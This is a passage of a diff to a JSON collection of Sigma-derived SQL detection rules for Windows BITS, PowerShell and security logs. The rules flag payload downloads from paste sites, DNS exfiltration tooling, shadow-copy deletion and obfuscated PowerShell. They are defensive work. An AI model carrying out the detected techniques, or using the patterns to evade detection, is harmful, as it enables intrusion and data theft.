ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" - ], - "filename": "win_bits_client_direct_ip_access.yml" - }, - { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.execution" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Task Added by Powershell", - "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate script" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_susp_powershell_job.yml" - }, - { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "filename": "posh_ps_invoke_dnsexfiltration.yml" + }, + { + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", - "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", + "status": "experimental", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "title": "Potential PowerShell Obfuscation Using Character Join", + "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_susp_alias_obfscuation.yml" }, { - "title": "USB Device Plugged", - "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "status": "test", - "description": "Detects plugged/unplugged USB devices", - "author": "Florian Roth (Nextron Systems)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1200" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_usb_device_plugged.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", - "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "title": "Suspicious Get Information for SMB Share", + "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "status": "test", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_susp_smb_share_reco.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious SSL Connection", + "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "status": "test", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1573" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Legitimate administrative script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_susp_ssl_keyword.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 